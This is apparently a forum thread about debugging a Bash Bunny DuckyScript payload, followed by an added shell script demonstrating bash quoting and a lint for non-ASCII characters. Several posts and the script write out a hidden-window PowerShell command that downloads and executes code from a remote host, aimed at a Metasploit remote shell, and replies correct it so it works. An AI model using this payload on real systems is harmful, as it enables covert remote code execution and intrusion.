Posted

Hi, I'm testing something with my BB and I got stuck on a DuckyScript line.

Q STRING powershell.exe -nop -w hidden -c \$H=new-object net.webclient\;IEX \$H.downloadstring\(\’http://192.168.145.138/ztgBcA7n\'\)\;

In my opinion this should be OK; however, when executed, this is what it types in:

Q STRING powershell.exe -nop -w hidden -c $H=new-object net.webclient;IEX $H.downloadstring(

I don't understand why it doesn't escape the ' properly, but that's probably because of my own lack of knowledge :-) Could someone help me out?

Posted

With the v1.1 firmware, you should now be able to use 'RUN WIN powershell...'.

If you don't want to put the DuckyScript in a separate file, which is generally recommended when you have more than a few lines, I would create a payload that opens Notepad and types a few lines to see where you are having issues. Keep in mind that the STRING you are printing is interpreted by bash prior to being fed to the HID device.

First guess without trying anything is that you don't need to escape the single quote after 'downloadstring'.

Posted

@LowValueTarget Thanks for your reply. I tried it with WIN RUN powershell. Results were the same.

I'm trying to create the same thing as on this page: https://cyberarms.wordpress.com/2017/03/27/bash-bunny-windows-remote-shell-using-metasploit-powershell/

Everything seems to work fine, except for the PowerShell line he enters in the 'run' field. I tried with or without escaping the single quote; that did not make a difference. When I remove the single quote it pastes the whole line just fine. So it does seem the problem is with the single quote; the question is why it doesn't get escaped properly. It did seem to work in the tutorial I pasted above and also in some online video I have seen.

Posted (edited)

I think it's because of this: \(\’http://192.168.145.138/ztgBcA7n\'\)\;

The first one isn't a single quote but a curly apostrophe, and the ending one is a single quote.

And there is no definition for the curly apostrophe ’ in your language.json file.

 

Edited by elkentaro
Posted
On 4/14/2017 at 6:26 AM, rizzah said:

Q STRING powershell.exe -nop -w hidden -c \$H=new-object net.webclient\;IEX \$H.downloadstring\(\’http://192.168.145.138/ztgBcA7n\'\)\;

Or you can enclose your whole string command in double quotes, and then you only have to escape "&"s and other double quotes you want to show up.

Q STRING "powershell.exe -nop -w hidden -c \"\$H=new-object net.webclient;IEX \$H.downloadstring('http://192.168.145.138/ztgBcA7n');\""
or shortened....
Q STRING "powershell.exe -nop -w hidden -c \"IEX (new-object net.webclient).downloadstring('http://192.168.145.138/ztgBcA7n')\""
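Two points in this thread are easy to check on any machine with a POSIX shell: LowValueTarget's remark that the text after Q STRING is processed by bash before the HID layer sees it, and the double-quoted variant in the last reply. The script below is an added example and is not the Bash Bunny firmware's code or anything posted in the thread. It assumes (stand-in `hid_string`) that Q STRING types its already-parsed words joined by single spaces; it shows the backslash-escaped form with ASCII apostrophes, the double-quoted form with and without a stray `\'`, and a small lint (`lint_payload`) that flags lines containing non-ASCII bytes such as the curly apostrophe elkentaro spotted. The sample payload.txt it writes is constructed for the demo; the IP and path are the ones from the thread.

```shell
#!/bin/sh
# Added example, not from the thread or from Hak5's Bash Bunny firmware.
# Approximates what bash does to a "Q STRING ..." line before the text reaches
# the HID layer, and lints a payload file for bytes outside printable ASCII
# (for example the curly apostrophe U+2019 that broke the line in the thread).

# Stand-in for Q STRING. Assumption: the real Bash Bunny command receives the
# words bash has already parsed and types them joined by single spaces, which
# is exactly what "$*" prints here.
hid_string() {
    printf '%s\n' "$*"
}

# Unquoted form: every shell-special character is backslash-escaped and both
# apostrophes are plain ASCII (U+0027). Bash strips the backslashes and the
# PowerShell line arrives intact.
case_escaped() {
    hid_string powershell.exe -nop -w hidden -c \$H=new-object net.webclient\;IEX \$H.downloadstring\(\'http://192.168.145.138/ztgBcA7n\'\)\;
}

# Double-quoted form with a mistake: inside double quotes bash removes a
# backslash only before $ ` " \ or newline, so the \' before the closing
# apostrophe survives and a stray backslash is typed into the URL.
case_double_quoted_stray_backslash() {
    hid_string "powershell.exe -nop -w hidden -c \"IEX (new-object net.webclient).downloadstring('http://192.168.145.138/ztgBcA7n\')\""
}

# Double-quoted form done right: only $ and the inner double quotes need a
# backslash; single quotes, semicolons and parentheses need nothing.
case_double_quoted() {
    hid_string "powershell.exe -nop -w hidden -c \"IEX (new-object net.webclient).downloadstring('http://192.168.145.138/ztgBcA7n')\""
}

# Print line:content for every line of FILE holding a byte outside printable
# ASCII (tabs allowed). Exit status 0 if something was found, 1 if clean.
lint_payload() {
    LC_ALL=C grep -n '[^[:print:][:blank:]]' "$1"
}

# Write a constructed payload.txt to PATH that reproduces the thread's bug:
# the opening apostrophe is the UTF-8 curly one (bytes E2 80 99).
write_sample_payload() {
    {
        printf '%s\n' 'LED SETUP'
        printf '%s\n' 'ATTACKMODE HID'
        printf '%s' 'Q STRING powershell.exe -nop -w hidden -c IEX $H.downloadstring('
        printf '\342\200\231'
        printf '%s\n' "http://192.168.145.138/ztgBcA7n')"
    } > "$1"
}

# Usage: sh quoting_demo.sh demo
if [ "${1:-}" = "demo" ]; then
    echo "escaped:       $(case_escaped)"
    echo "dq, stray \\:  $(case_double_quoted_stray_backslash)"
    echo "dq, correct:   $(case_double_quoted)"
    tmp=$(mktemp)
    write_sample_payload "$tmp"
    echo "lint of constructed payload.txt:"
    lint_payload "$tmp" || echo "(clean)"
    rm -f "$tmp"
fi
```

Running `lint_payload` against the real payload.txt before copying it to the Bunny is the quick check for this class of problem: a character that has no entry in the selected language.json cannot be typed, so anything the lint flags should be replaced with its ASCII equivalent.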
